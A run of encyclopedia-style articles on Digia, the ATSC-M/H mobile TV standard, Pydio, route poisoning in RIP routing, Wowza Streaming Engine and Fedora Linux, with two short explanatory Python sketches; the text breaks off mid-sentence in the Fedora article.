acquired the entire Qt development environment and related business from Nokia. With the acquisition, Digia took over all operations related to Qt technology, such as product development. The most important goal of the acquisition was to improve Digia's position in the Qt ecosystem and to expand the availability of Qt technology to an increasing number of platforms. The Qt investment of EUR 4 million yielded at least tens of millions of euros to shareholders. Digia's CEO Juha Varelius negotiated the Qt deal with Nokia after Nokia had abandoned its old subcontractors. In 2016, Talouselämä magazine estimated that the deal was made at a dumping price. Nokia had acquired the Norwegian company Trolltech and its application development environment Qt for EUR 104 million in January 2008. 
In August 2015, Digia Oyj's Board of Directors decided to explore a possible spin-off that would separate its domestic and Qt businesses and create two distinct companies, with identical ownership, listed on the Helsinki Stock Exchange. Digia's largest shareholder was Ingman Development, owned by the Ingman family, which held a stake of more than one fifth. Digia's turnover totalled EUR 108 million. Digia 2016–Present Digia Oyj's Annual General Meeting decided on Digia's partial demerger in March 2016, and the demerger was registered in the Trade Register on 1 May. Digia's Qt business was transferred to Qt Group with Digia's domestic business remaining under the Digia brand. Digia's CEO Juha Varelius became the CEO of Qt Group while Timo Levoranta, who had started as the head of the domestic business unit early in the year, took up the post as CEO of the new Digia. In June 2016, Digia acquired Igence, a consulting firm owned by Transaktum, to improve its position in the e-commerce market. Igence employed 24 people and its service portfolio included e-commerce, product information management, order management and personalisation software as well as expert services, with a turnover of EUR 2.26 million in 2015. In October 2016, the Finnish Tax Administration announced that it had selected Digia to implement the National Incomes Register. In the spring of 2017, Digia acquired Omni Partners Oy and its subsidiary Oy Nord Software Ltd. In May, Digia's Board of Directors announced that it would organise a rights issue in order to raise approximately EUR 12.05 million in net assets for corporate acquisitions, growth investments, to bolster the company's capital structure and for general financing needs. The rights issue was oversubscribed with over 6.8 million shares subscribed, representing approximately 115% of the shares offered. The issue generated gross proceeds amounting to approximately EUR 12.5 million. The company established Financial Operations to support the growth of its product and service business and combined Horizontal Services with the functions reporting to the CTO. In December, Digia acquired Integration House. Digia had more than 800 employees and its turnover totaled EUR 96.2 million. In March 2018, Digia acquired Avarea Oy, a Helsinki-based company specialising in analytics software, which had a turnover of approximately EUR 3.6 million. Avarea's product business was excluded from the acquisition and transferred into its own company. 41 employees joined Digia. In the summer of 2018, Digia announced the acquisition of Mavisystems and its subsidiary Mirosys Oy. The companies, which employed a total of 34 people, specialised in Microsoft Dynamics ERP systems and CRM software and their turnover totaled approximately EUR 3.2 million in the financial period ended in June 2017. Digia's turnover totaled EUR 112.1 million and it employed 1,069 people. The company's operating margin was 5.8 per cent. In June 2019, Digia announced the acquisition of Accountor Enterprise Solutions, a subsidiary of Accountor focused on business platforms and services whose software centered around Microsoft Dynamics 365 and Oracle NetSuite services. The purchase price was EUR 9.4 million. Accountor Enterprise Solutions had a turnover of EUR 12.7 million in 2018 and it employed 114 people in June 2019. Digia's turnover was increased especially by good demand for online business, integrations and software interface services, Microsoft ERP systems and business analytics. 
Organisation The company's CEO has been Timo Levoranta since 2016. In 2020, Digia's Board of Directors included, in addition to Chairman Robert Ingman, Seppo Ruotsalainen, Martti Ala-Härkönen, Päivi Hokkanen, Santtu Elsinen and Outi Taivainen. In December 2019, Digia's largest shareholders were Ingman Development, Ilmarinen, Etola, Tiiviste-Group, Varma Mutual Pension Insurance Company, Matti Savolainen, SEB Group, Nordea, and OP Financial Group. In 2020, Digia's services were divided into six categories: Service design and business consulting, Digital services, such as e-commerce, product data management, mobile services and online services, Data analytics, such as data platform, data management, customer intelligence, profitability analytics, Artificial intelligence and Internet of things, Integration and API; In online shops for example, the integration chain progresses from the user interface to the company's business ecosystem and affects things such as how seamlessly the systems of the company and its suppliers work together. Business systems such as Microsoft and Oracle ERP systems, which Digia tailors for customer companies, in addition to Digia's own ERP system. Digia has been the largest provider of Microsoft Dynamics in Finland since July 2018. Monitoring and service management. Customers Digia's customers include Gasum, the Helsinki Regional Transport Authority, the Emergency Response Centre Agency in Finland, the Finnish Defence Forces, St1 and the Finnish Tax Administration. Digia has redesigned, for example, the Stockmann online shop and its ERP platform is used by Etola, among others. Awards In 2017, the 112 Suomi mobile application implemented by the Emergency Response Centre Agency and Digia won a national social welfare and healthcare safety award in Finland. The 112 Suomi application uses satellite positioning to locate those in need of assistance. The application sends the coordinates directly to the Emergency Response Centre's information system when a person in need of assistance uses the application to call the emergency telephone number. References Companies established in 1990 ERP software Software companies of Finland
11540737
https://en.wikipedia.org/wiki/ATSC-M/H
ATSC-M/H
ATSC-M/H (Advanced Television Systems Committee - Mobile/Handheld) is a U.S. standard for mobile digital TV that allows TV broadcasts to be received by mobile devices. ATSC-M/H is a mobile TV extension to the preexisting terrestrial TV broadcasting standard ATSC A/53. It corresponds to the European DVB-H and the Japanese 1seg, the mobile extensions of the DVB-T and ISDB-T terrestrial digital TV standards respectively. ATSC is optimized for fixed reception in the typical North American environment and uses 8VSB modulation. The ATSC transmission method is not robust enough against Doppler shift and multipath radio interference in mobile environments, and is designed for highly directional fixed antennas. To overcome these issues, additional channel coding mechanisms are introduced in ATSC-M/H to protect the signal. As of 2021, ATSC-M/H is considered to have been a commercial failure. Evolution of mobile TV standard Requirements Several requirements of the new standard were fixed right from the beginning: complete backward compatibility with ATSC (A/53); broadcasters can use their available license without additional restrictions; and available legacy ATSC receivers can be used to receive the ATSC (A/53) standard without any modification. Proposals Ten systems from different companies were proposed, and the two remaining systems were presented with transmitter and receiver prototypes: MPH (an acronym for mobile/pedestrian/handheld, suggesting miles per hour) was developed by LG Electronics and Harris Broadcast. (Zenith, a subsidiary of LG, developed much of the original ATSC system.) A-VSB (Advanced-VSB) was developed by Samsung and Rohde & Schwarz. To find the best solution, the Advanced Television Systems Committee assigned the Open Mobile Video Coalition (OMVC) to test both systems. The test report was presented on May 15, 2008. As a result of this detailed work by the OMVC, a final standard draft was designed by the Advanced Television Systems Committee, specialist group S-4. The resulting ATSC-M/H standard is a hybrid; essentially, the following components of the proposed systems are used: the RF layer from the MPH standard, the deterministic frame structure from A-VSB, and service signaling designed on the basis of established mobile standards. Standard milestones On December 1, 2008, the Advanced Television Systems Committee elevated its specification for Mobile Digital Television to Candidate Standard status. In the following six months, the industry tested the standard. Before it became an official standard, additional improvements were proposed. ATSC members approved the ballot on October 15, 2009, making it official standard A/153. In January 2010, at the Consumer Electronics Show, ATSC introduced the name and logo "MDTV" for ATSC A/153. Structure of mobile DTV standard The ATSC Mobile DTV standard ATSC-M/H (A/153) is modular in concept, with the specifications for each of the modules contained in separate Parts. The individual Parts of A/153 are as follows: Part 1 “ATSC Mobile DTV System” describes the overall ATSC Mobile DTV system and explains the organization of the standard. It also describes the explicit signaling requirements that are implemented by data structures throughout the other Parts. Part 2 “RF/Transmission System Characteristics” describes how the data is processed and placed into the VSB frame. Major elements include the Reed Solomon (RS) Frame, a Transmission Parameter Channel (TPC), and a Fast Information Channel (FIC).
Part 3 “Service Multiplex and Transport Subsystem Characteristics” covers the service multiplex and transport subsystem, which comprises several layers in the stack. Major elements include Internet Protocol (IPv4), the User Datagram Protocol (UDP), the Signaling Channel Service, FLUTE over Asynchronous Layered Coding (ALC) / Layered Coding Transport (LCT), a Network Time Protocol (NTP) time service, and the Real-time Transport Protocol (RTP) / RTP Control Protocol (RTCP). Part 4 “Announcement” covers Announcement, where services can optionally be announced using a Service Guide. The guide specified in Part 4 is based on the Open Mobile Alliance (OMA) broadcast (BCAST) electronic program guide, with constraints and extensions. Part 5 “Application Framework” defines the Application Framework, which enables the broadcaster of the audio-visual service to author and insert supplemental content to define and control various additional elements of the Rich Media Environment (RME). Part 6 “Service Protection” covers Service Protection, which refers to the protection of content, either files or streams, during delivery to a receiver. Major elements include the Right Issue Object and the Short-Term Key Message (STKM). Part 7 “AVC and SVC Video System Characteristics” defines the Advanced Video Coding (AVC) and Scalable Video Coding (SVC) Video System in the ATSC Mobile DTV system. Additional elements covered in this Part include closed captioning (CEA 708) and Active Format Description (AFD). Part 8 “HE AAC Audio System Characteristics” defines the High-Efficiency Advanced Audio Coding (HE-AAC v2) Audio System in the ATSC Mobile DTV system. Part 9 “Scalable Full Channel Mobile Mode” Principle ATSC-M/H is a service for mobile TV receivers and partly uses the 19.39 Mbit/s ATSC 8VSB stream. The mobile data is carried in an unreferenced Packet ID, so legacy receivers ignore the mobile data. Technology ATSC-M/H bandwidth consumes fixed chunks of 917 kbit/s out of the total ATSC bandwidth. Each such chunk is called an M/H Group. A data pipe called a parade is a collection of one to eight M/H groups. A parade conveys one or two ensembles, which are logical pipes of IP datagrams. Those datagrams in turn carry TV services, system signaling tables, OMA DRM key streams and the Electronic Service Guide. ATSC-M/H has an improved design based on detailed analyses of experiences with other mobile DTV standards. Protocol stack The ATSC-M/H protocol stack is mainly an umbrella protocol that uses OMA ESG, OMA DRM and MPEG-4 in addition to many IETF RFCs. Transport stream data structure The ATSC-M/H standard defines a fixed transport stream structure, based on M/H Frames, which establishes the location of M/H content within the VSB Frames and allows for easier processing by an M/H receiver. This is contrary to the legacy ATSC transport stream, defined in A/53, in which there is no fixed structure to establish the phase of the data relative to VSB Frames. One M/H Frame is equivalent in size to 20 VSB Frames and has an offset of 37 transport stream (TS) packets relative to the beginning of the VSB Frame. Each M/H Frame, which has a fixed duration of 968 ms, is divided into five M/H sub-frames and each sub-frame is further subdivided into sixteen M/H Slots. Each slot is the equivalent amount of time needed to transmit 156 TS packets. A slot may either carry all main ATSC data (A/53) or 118 packets of M/H data and 38 packets of main data. The collection of 118 M/H packets transmitted within a slot is called an M/H Group.
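The packet counts and frame duration quoted above are enough to reconstruct both the overall 8VSB payload rate and the per-group figure; the arithmetic suggests that the 917 kbit/s chunk corresponds to allocating one M/H Group in each of the five sub-frames of a frame. The following short Python sketch only illustrates that arithmetic using the numbers given in this section; it is not drawn from the A/153 text itself.

# Derive ATSC-M/H data rates from the frame structure described above.
TS_PACKET_BYTES = 188        # size of one MPEG transport stream packet
FRAME_SECONDS = 0.968        # one M/H Frame lasts 968 ms
SUBFRAMES_PER_FRAME = 5
SLOTS_PER_SUBFRAME = 16
PACKETS_PER_SLOT = 156       # a slot equals the time of 156 TS packets
MH_PACKETS_PER_GROUP = 118   # M/H packets carried in one M/H Group

# Total payload rate: 5 * 16 * 156 packets every 968 ms.
total_packets = SUBFRAMES_PER_FRAME * SLOTS_PER_SUBFRAME * PACKETS_PER_SLOT
total_rate = total_packets * TS_PACKET_BYTES * 8 / FRAME_SECONDS
print(f"ATSC payload rate: {total_rate / 1e6:.2f} Mbit/s")   # ~19.39 Mbit/s

# One chunk: one M/H Group in each of the five sub-frames (5 * 118 packets per frame).
group_rate = (SUBFRAMES_PER_FRAME * MH_PACKETS_PER_GROUP
              * TS_PACKET_BYTES * 8 / FRAME_SECONDS)
print(f"Per-group M/H rate: {group_rate / 1e3:.0f} kbit/s")  # ~917 kbit/s

Note that these are gross figures: the MHE encapsulation and the forward error correction described in the following paragraphs consume part of this capacity, so the usable payload of a parade is lower and depends on the Reed–Solomon and SCCC code rates chosen.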
Each of the 118 M/H packets within an M/H Group is encapsulated inside a special TS packet, known as an MHE packet. An M/H Parade is a collection of M/H Groups and can carry one or two M/H Ensembles. These Ensembles are logical pipes for IP datagrams. Those datagrams in turn carry TV services and the signaling of mobile content. The M/H Groups from a single Parade are placed within M/H Slots according to an algorithm defined in A/153 Part 2. The Number of Groups per M/H Sub-Frame (NoG) for an M/H Parade ranges from 1 to 8, and therefore the number of Groups per M/H Frame for a Parade ranges from 5 to 40 with a step of 5. The data of a Parade are channel coded and distributed by an interleaver during an M/H Frame. Mobile data are protected by additional forward error correction (FEC) in the form of interleaving and convolutional codes. To improve reception, training sequences are introduced into the ATSC-M/H signal to allow channel estimation on the receiver side. Time slicing is a technique used by ATSC-M/H to provide power savings on receivers. It is based on the time-multiplexed transmission of different services. Error protection ATSC-M/H combines multiple error protection mechanisms for added robustness. One is an outer Reed–Solomon error correction code, which corrects defective bytes after the inner convolutional code has been decoded in the receiver. The correction is improved by an additional CRC checksum, since bytes can be marked as defective before they are decoded (erasure decoding). The number of RS parity symbols can be 24, 36 or 48. The symbols and the additional checksum form the outer elements of a data matrix which is filled with the payload of the M/H Ensemble. The number of rows is fixed and the number of columns varies according to how many slots per sub-frame are occupied. The RS Frame is then partitioned into several segments of different sizes and assigned to specified regions. The M/H data in these regions are protected by an SCCC (Serial Concatenated Convolutional Code) with a code rate of 1/2 or 1/4 that is specific to each region in a group. A 1/4 rate PCCC (Parallel Concatenated Convolutional Code) is also employed as an inner code for the M/H signaling channel, which includes the FIC (Fast Information Channel) and TPC (Transmission Parameter Channel). The TPC carries the various FEC modes and M/H Frame information. Once the TPC is extracted, the receiver knows the code rates being employed and can decode each region at its specified rate. A modified trellis encoder is also employed for backwards compatibility with legacy A/53 receivers. The time interleaving of ATSC-M/H is 1 second. Signaling ATSC-M/H Signaling and Announcement defines three different layers of signaling. The layers are organized hierarchically and optimized to the characteristics of the transmission layer. The Transmission Signaling System is the lowest layer and uses the Transmission Parameter Channel (TPC). It provides the information the receiver needs to decode the signal. The Transport Signaling System is the second layer, which uses the Fast Information Channel (FIC) in combination with the Service Signaling Channel (SSC). The main purpose of the FIC is to deliver essential information to allow rapid service acquisition by the receiver. The Service Signaling Channel (SSC) consists of several different signaling tables. The information carried within these tables can be compared to the PSIP information of ATSC. 
The SSC mainly provides the basic information: the logical structure of the transmitted services and the decoding parameters for video and audio. Announcement / Electronic Service Guide (ESG) is the highest layer of signaling. It uses the Open Mobile Alliance (OMA) Broadcast Service Enabler Suite (OMA BCAST) Electronic Service Guide (ESG). An ESG is delivered as a file data session; File Delivery over Unidirectional Transport (FLUTE) is used as the delivery protocol. The ESG consists of several XML sections. With this structure, a program guide and interactive services can be realized. Signaling of video and audio coding Each video or audio decoder needs information about the coding parameters used, for instance resolution, frame rate and IDR (Random Access Point) repetition rate. In MPEG-4/AVC mobile TV systems, the receiver uses information from the Session Description Protocol file (SDP file). The SDP file is a format which describes streaming media initialization parameters. In ATSC-M/H, the SDP file is transmitted within the SMT table. Most of the information is coded in binary, but some is coded in the original ASCII text format. The SMT table combines information that is typically spread over different tables and reduces the complexity for the network and the receivers. In the case of signaling with the ESG, the complete SDP file is transmitted. Single-frequency network (SFN) In an SFN, two or more transmitters with overlapping coverage send the same program content simultaneously on the same frequency. The 8VSB modulation used by ATSC allows SFN transmissions. To allow regular channel estimation, ATSC-M/H provides additional training sequences. ATSC A/110 defines a method to synchronize the ATSC modulator as part of the transmitter. The A/110 standard sets up the trellis coder in a pre-calculated way at all transmitters of the SFN. In such an SFN, the ATSC-M/H multiplexer and the ATSC-M/H transmitters are synchronized by a GPS reference. The ATSC-M/H multiplexer operates as a network adapter and inserts time stamps in the MPEG transport stream. Each transmitter analyzes the time stamp and delays the transport stream before it is modulated and transmitted. As a result, all SFN transmitters generate a synchronized signal. Other mobile standards Until its shutdown, MediaFLO had been available in parts of the United States. It was a premium service that required a subscription. ATSC-M/H, by contrast, is free to air, as are regular broadcast signals. References External links ATSC Broadcast engineering Mobile telephone broadcasting Mobile television Television transmission standards
51389352
https://en.wikipedia.org/wiki/Pydio
Pydio
Pydio Cells, previously known as just Pydio and formerly known as AjaXplorer, is an open-source file-sharing and synchronisation software that runs on the user's own server or in the cloud. Presentation The project was created by musician Charles Du Jeu (current CEO and CTO) in 2007 under the name AjaXplorer. The name was changed in 2013 and became Pydio (an acronym for Put Your Data in Orbit). In May 2018, Pydio switched from PHP to Go with the release of Pydio Cells. The PHP version reached end-of-life state on 31 December 2019. Pydio Cells runs on any server supporting a recent Go version (Windows/Linux/macOS on the Intel architecture is directly supported; a fully-functional working ARM implementation is under active development). The current offering of Pydio, known as Pydio Cells, has been developed from scratch using the Go programming language. Nevertheless, the web-based interface of Cells is very similar to the one from Pydio 8 (in PHP), and it successfully replicates most of the features, while adding a few more. There is also a new synchronisation client (also written in Go). The PHP version is being phased out as the company's focus is moving to Pydio Cells, with community feedback on the new features. According to the company, the switch to the new environment was made "to overcome inherent PHP limitations and provide you with a future-proof and modern solution for collaborating on documents". From a technical point of view, Pydio differs from solutions such as Google Drive or Dropbox. Pydio is not based on a public cloud, the software indeed connects to the user's existing storages (SAN / Local FS, SAMBA / CIFS, (s)FTP, NFS, etc...) as well as to the existing user directories (LDAP / AD, SAML, Radius, Shibboleth...), which allows companies to keep their data inside their infrastructure, according to their data security policy and user rights management. The software is built in a modular perspective; various plugins allow administrators to implement extra features. Pydio is available either through a community distribution, or an Enterprise Distribution. Features File sharing between different internal users and across other Pydio instances SSL/TLS Encryption WebDAV file server Creation of dedicated workspaces, for each line of business / project / client, with a dedicated user rights management for each workspace. File-sharing with external users (private links, public links, password protection, download limitation, etc.) Online viewing and editing of documents with Collabora Office (the Enterprise Distribution also offers OnlyOffice integration) Preview and editing of image files Integrated audio and video reader Client applications are available for all major desktop and mobile platforms. See also Comparison of file synchronization software References External links (Pydio Cells) (Pydio Cells Synchronisation Client) (Pydio PHP version, deprecated on December 31, 2019) Cloud computing Cloud storage File hosting Free software for cloud computing Free software programmed in PHP Free software programmed in Go
2539918
https://en.wikipedia.org/wiki/Route%20poisoning
Route poisoning
Route poisoning is a method used in computer networks to prevent a router from sending packets through a route that has become invalid. Distance-vector routing protocols use route poisoning to indicate to other routers that a route is no longer reachable and should be removed from their routing tables. Unlike split horizon with poison reverse, route poisoning provides for sending updates with unreachable hop counts immediately to all the nodes in the network. When the protocol detects an invalid route, all of the routers in the network are informed that the bad route has an infinite (∞) route metric. This makes all nodes on the invalid route seem infinitely distant, preventing any of the routers from sending packets over the invalid route. Some distance-vector routing protocols, such as RIP, use a maximum hop count to determine how many routers the traffic must go through to reach the destination. Each route has a hop count number assigned to it which is incremented as the routing information is passed from router to router. A route is considered unreachable if the hop count exceeds the maximum allowed. Route poisoning quickly purges outdated routing information from other routers' routing tables by changing the route's hop count to an unreachable value (higher than the maximum number of hops allowed) and sending a routing update. In the case of RIP, the maximum hop count is 15, so to perform route poisoning on a route its hop count is changed to 16, deeming it unreachable, and a routing update is sent. If these updates are lost, some nodes in the network would not be informed that a route is invalid, so they could attempt to send packets over the bad route and cause a problem known as a routing loop. Therefore, route poisoning is used in conjunction with holddowns to keep update messages from falsely reinstating the validity of a bad route. This prevents routing loops, improving the overall efficiency of the network. References The TCP-IP Guide, RIP Special Features For Resolving RIP Algorithm Problems, by Charles M. Kozierok RFC 1058: Routing Information Protocol, by C. Hedrick, Rutgers University (June 1988) Internet Standards Internet protocols Routing protocols
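As an illustration of the mechanism described above, the following Python sketch simulates a router poisoning a failed route in a simple RIP-style distance-vector table. It is a simplified explanatory model, not an implementation of RIP: the table layout and function names are invented for the example, while the hop-count values (15 as the maximum, 16 as the unreachable metric) follow the article.

```python
# Simplified illustration of route poisoning in a RIP-style distance-vector table.
# The data structures and function names are invented for this example.

RIP_MAX_HOPS = 15      # maximum usable hop count in RIP
RIP_INFINITY = 16      # hop count that marks a route as unreachable ("poisoned")

# routing table: destination network -> (next hop, hop count)
routing_table = {
    "10.0.1.0/24": ("192.168.0.2", 3),
    "10.0.2.0/24": ("192.168.0.3", 5),
}

def is_reachable(hops: int) -> bool:
    """A route is usable only while its hop count does not exceed the maximum."""
    return hops <= RIP_MAX_HOPS

def poison_route(table: dict, destination: str) -> dict:
    """Mark a failed route as unreachable and build the update to advertise."""
    next_hop, _ = table[destination]
    table[destination] = (next_hop, RIP_INFINITY)   # poison: set metric to "infinity"
    # The poisoned metric is advertised immediately to all neighbours so they
    # stop using the route instead of waiting for it to time out.
    return {destination: RIP_INFINITY}

# The link to 10.0.1.0/24 fails: poison it and send the triggered update.
update = poison_route(routing_table, "10.0.1.0/24")
print("triggered update:", update)                                         # {'10.0.1.0/24': 16}
print("still reachable :", is_reachable(routing_table["10.0.1.0/24"][1]))  # False
```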
29349987
https://en.wikipedia.org/wiki/Wowza%20Streaming%20Engine
Wowza Streaming Engine
Wowza Streaming Engine (known as Wowza Media Server prior to version 4) is a unified streaming media server software developed by Wowza Media Systems. The server is used for streaming of live and on-demand video, audio, and rich Internet applications over IP networks to desktop, laptop, and tablet computers, mobile devices, IPTV set-top boxes, internet-connected TV sets, game consoles, and other network-connected devices. The server is a Java application deployable on most operating systems. History Version 1.0.x was released on February 19, 2007. This version was originally offered as an alternative to the Adobe Flash Media Server, and supported streamed video, audio and RIAs for Flash Player client playback and interaction based on the Real Time Messaging Protocol (RTMP), using content encoded with Spark and VP6 codecs. The original product name was Wowza Media Server Pro. Version 1.5.x was released on May 15, 2008 and added support for H.264 video and Advanced Audio Coding (AAC) audio, and ingest support for Real Time Streaming Protocol (RTSP), Real-time Transport Protocol (RTP), MPEG transport stream (MPEG-TS), and ICY (SHOUTcast/Icecast) sources for re-streaming to the Flash Player client. Version 2.0.x was released on December 17, 2009. The product name was changed to Wowza Media Server 2. This version added outbound H.264 streaming support for the Apple HTTP Live Streaming protocol for iOS devices (iPad, iPhone, etc.), Microsoft HTTP Smooth Streaming for the Silverlight player, RTSP/RTP for QuickTime Player and mobile devices based on Android, BlackBerry (RIM), Symbian (Symbian Foundation), Palm webOS (now owned by HP), and other platforms, and TV set-top boxes and video game consoles. Version 3.0.x was released on October 7, 2011. This version added network DVR, live transcoding, and DRM plug-in functionality. Version 3.5 was released on November 7, 2012. This version added closed captioning and a Silverlight Multicast Player. Live Stream Record and Media Security, previously additional features external to the software, were incorporated into the server software. Media Security DRM plugins were provided for Verimatrix VCAS, Microsoft PlayReady, BuyDRM KeyOS Services, EZDRM Hosted DRM, and AuthenTec DRM Fusion. Wowza also released the free Wowza StreamLock AddOn, which provides 256-bit SSL for RTMPS and HTTPS. The release included enhancements to the Wowza Transcoder AddOn, such as transcoder overlays that can be used for advertising, titling, watermarks and tickers. Other new features included B-frame support, Dolby Digital Plus (EAC3) pass-through for HLS, MPEG-DASH, and HTTP Origin. Version 3.6 was released June 10, 2013. Wowza Media Server 3.6 added basic support for Dynamic Adaptive Streaming over HTTP (DASH) and expanded support for closed captioning formats for live and video-on-demand streams. Version 4.0 was released February 11, 2014. The product name was changed to Wowza Streaming Engine. This release included a new web-based graphical interface which interacts with the server via a REST API and provides monitoring and configuration functions. It also brought full support for MPEG-DASH and support for additional captioning formats. Previously available separately, the MediaCache and Push Publishing add-on modules were incorporated into the server. Version 4.2 was released on June 16, 2015. This release included the Stream Targets feature in Wowza Streaming Engine Manager, which enables an incoming live source stream to be sent to one or more destinations that re-distribute the source stream to users. 
Stream target destinations allow broadcasters to scale and add redundancy to a live streaming workflow. Version 4.3 was released on October 6, 2015. New functionality included full access to the Wowza Streaming Engine REST API, which can be used to configure, manage, and monitor the media server through HTTP requests. Version 4.7.3 was released on November 14, 2017. Wowza Streaming Engine 4.7.3 added support for Secure Reliable Transport (SRT) in Wowza Streaming Engine media servers on Linux and Windows operating systems. Wowza Streaming Engine 4.7.3 also introduced the ability to create a generic stream target that sends an SRT stream from Wowza Streaming Engine to destinations such as content delivery networks (CDNs) and streaming services for distributed delivery. Version 4.7.6 was released on July 31, 2018. New functionality included support for MPEG-DASH with nDVR. The Wowza nDVR feature enables a live stream to be recorded with Wowza Streaming Engine while simultaneously allowing users to play or pause the live stream, rewind it to a previously recorded point, or resume viewing at the current live point. Version 4.7.7 was released on November 13, 2018. Wowza Streaming Engine 4.7.7 added support for WebRTC. Wowza Streaming Engine can ingest source WebRTC audio and video content and deliver it to supporting players. It can also transmux or transcode WebRTC to other streaming protocols, including Apple HLS, Adobe HDS, RTMP, RTSP, and Microsoft Smooth Streaming. Version 4.7.8 was released November 5, 2019. Added functionality included support for Low-Latency HLS, allowing Wowza Streaming Engine to generate Low-Latency HLS live streams. Wowza Streaming Engine also gained support for the Common Media Application Format (CMAF), the open, extensible standard that enables efficient streaming using the HLS and MPEG-DASH protocols. Version 4.8 was released February 18, 2020. The update added full support for WebRTC and Secure Reliable Transport (SRT) streaming, the CMAF packetizer for MPEG-DASH, HLS, and Low-Latency HLS streaming, and support for recording MPEG-DASH live streams with the nDVR feature. Version 4.8.5 was released June 17, 2020. Extensive updates related to WebRTC were added, including improved accuracy of RTCP feedback messages for adaptive encoding. Support was added for SRT version 1.4 and the EXT-X-PRELOAD-HINT media playlist tag for Low-Latency HLS. The new version also increased security. Formats Wowza Streaming Engine can stream to multiple types of playback clients and devices simultaneously, including the Adobe Flash player, Microsoft Silverlight player, Apple QuickTime Player and iOS devices (iPad, iPhone, iPod Touch), mobile phones, IPTV set-top boxes (Amino, Apple TV, Enseo, Fire TV, Roku, Streamit and others), and game consoles such as Wii, Xbox, and PS4. Wowza Streaming Engine is compatible with standard streaming protocols. On the playout side, these include RTMP (and the variants RTMPS, RTMPT, RTMPE, RTMPTE), HDS, HLS, MPEG-DASH, WebRTC, RTSP, Smooth Streaming, and MPEG-TS (unicast and multicast). On the live ingest side, the server can ingest video and audio via RTP, RTSP, RTMP, MPEG-TS (unicast and multicast), ICY (SHOUTcast / Icecast) and WebRTC streams. In 2017, Wowza and Haivision created the SRT Alliance to develop and promote the open-source SRT protocol for low-latency reliable-UDP delivery. For on-demand streaming, Wowza Streaming Engine can ingest multiple types of audio and video files. 
Supported file types include MP4 (QuickTime container - .mp4, .f4v, .mov, .m4a, .m4v, .mp4a, .mp4v, .3gp, and .3g2), FLV (Flash Video - .flv), and MP3 content (.mp3). Awards 2007 Streaming Media Magazine Editors’ Pick 2008 Streaming Media Magazine Editors’ Pick 2008 Streaming Media Magazine US Readers’ Choice (Best Server) 2009 Streaming Media Magazine US Readers’ Choice (Best Server; Best Streaming Innovation) 2010 TV Technology Europe Magazine STAR Award 2010 Streaming Media Magazine European Readers’ Choice Awards (Best Server; Best Innovation) 2010 WFX New Product Award (Best Overall New Media Product; Best Podcasting, Webcasting, and Website Streaming Media Solution) 2011 Streaming Media Magazine European Readers’ Choice Awards (Best Server; Best Streaming Innovation) 2012 European Readers' Choice Award (Best Server Software and Best Transcoding Solution) 2013 Streaming Media Magazine's All-Star Team named Wowza Co-Founder and CTO Charlie Good 2013 Streaming Media Magazine European Readers’ Choice Award (Server Hardware/Software) 2013 Streaming Media Readers’ Choice Award (Media Server) 2014 Streaming Media Magazine European Readers’ Choice Award (Best Streaming Innovation) Wowza Media Server Pro won the Server Hardware/Software category in the Streaming Media Readers' Choice Awards in 2008. Wowza Media Server 2 Advanced won the Best Streaming Innovation category in the Streaming Media Readers' Choice Awards in 2009. Wowza Media Server Pro won the Server Hardware/Software category in the Streaming Media Readers' Choice Awards in 2009. Wowza Media Server 2 won the Server Hardware/Software and Best Streaming Innovation of 2010 categories in the Streaming Media European Readers' Choice Awards in 2010. Wowza Media Server 3 won the Server Hardware/Software and the Best Streaming Innovation categories in the Streaming Media European Readers' Choice Awards in 2011. Wowza Media Server 3 won the Server Hardware/Software and the Best Streaming Innovation categories in the Streaming Media European Readers' Choice Awards in 2012. Additionally, the Wowza Media Server Transcoder Add-On won the Transcoding Solution category in the Streaming Media European Readers' Choice Awards in 2012. Wowza Media Server won the Server Hardware/Software category in the Streaming Media European Readers' Choice Awards in 2013. Wowza Media Server won the Media Server category in the Streaming Media Readers' Choice Awards in 2013. Wowza Streaming Engine won the Best Streaming Innovation category in the Streaming Media European Readers' Choice Awards in 2014. Wowza Streaming Engine won the Media Server category in the Streaming Media Readers' Choice Awards in 2014. Wowza Streaming Engine won the Media Server category in the Streaming Media Readers' Choice Awards in 2015. Wowza Streaming Engine won the Media Server category in the Streaming Media Readers' Choice Awards in 2016. Wowza Streaming Engine won the Server Hardware/Software category in the Streaming Media European Readers' Choice Awards in 2016. Wowza Streaming Engine won the Media Server category in the Streaming Media Readers' Choice Awards in 2017. Wowza Low Latency Streaming Platform won the Best Live Production/Streaming Product in the RedShark News awards at IBC 2017. Wowza Streaming Engine won the Media Server category in the Streaming Media Readers' Choice Awards in 2018. 
Wowza Media Systems was listed as one of the 50 Companies That Matter Most in Online Video in 2019 by Streaming Media. Wowza CEO David Stubenvoll was named a finalist in the EY Entrepreneur of the Year Award in 2019. Wowza was named Google Cloud Partner of the Year for Media in 2019. See also MPEG-DASH References External links Media servers Streaming software
9951070
https://en.wikipedia.org/wiki/Fedora%20Linux
Fedora Linux
Fedora Linux is a Linux distribution developed by the Fedora Project which is sponsored primarily by Red Hat (an IBM subsidiary) with additional support and sponsorship from other companies and organizations. Fedora contains software distributed under various free and open-source licenses and aims to be on the leading edge of open-source technologies. Fedora is the upstream source for Red Hat Enterprise Linux. Since the release of Fedora 30, five different editions are currently available: Workstation, focused on the personal computer; Server, for servers; CoreOS, focused on cloud computing; Silverblue, focused on an immutable desktop specialized for container-based workflows; and IoT, focused on IoT devices. A new version of Fedora Linux is released every six months. Fedora Linux has an estimated 1.2 million users, including Linus Torvalds, creator of the Linux kernel. Features Fedora has a reputation for focusing on innovation, integrating new technologies early on and working closely with upstream Linux communities. Making changes upstream instead of specifically for Fedora Linux ensures that the changes are available to all Linux distributions. Fedora Linux has a relatively short life cycle: each version is usually supported for at least 13 months, as a given version is supported only until one month after the release two versions later, with approximately six months between most versions. Fedora users can upgrade from version to version without reinstalling. The default desktop environment in Fedora Linux is GNOME and the default user interface is the GNOME Shell. Other desktop environments, including KDE Plasma, Xfce, LXQt, LXDE, MATE, Cinnamon, and i3, are available and can be installed. A live media drive can be created using Fedora Media Writer or the dd command. It allows users to try Fedora Linux without making changes to the hard disk. Package management Most Fedora Linux editions use the RPM package management system, with DNF as the tool for managing RPM packages. DNF uses libsolv, an external dependency resolver. Flatpak is also included by default, and support for snaps can be added. Fedora Linux uses Delta RPMs when updating installed packages to provide delta updates. A Delta RPM contains the difference between an old and new version of a package. This means that only the changes between the installed package and the new one are downloaded, reducing network traffic and bandwidth consumption. The Fedora CoreOS and Silverblue editions use rpm-ostree, a hybrid transactional image/package system, to manage the host. Traditional DNF (or other systems) should be used in containers. Security Fedora Linux uses Security-Enhanced Linux by default, which implements a 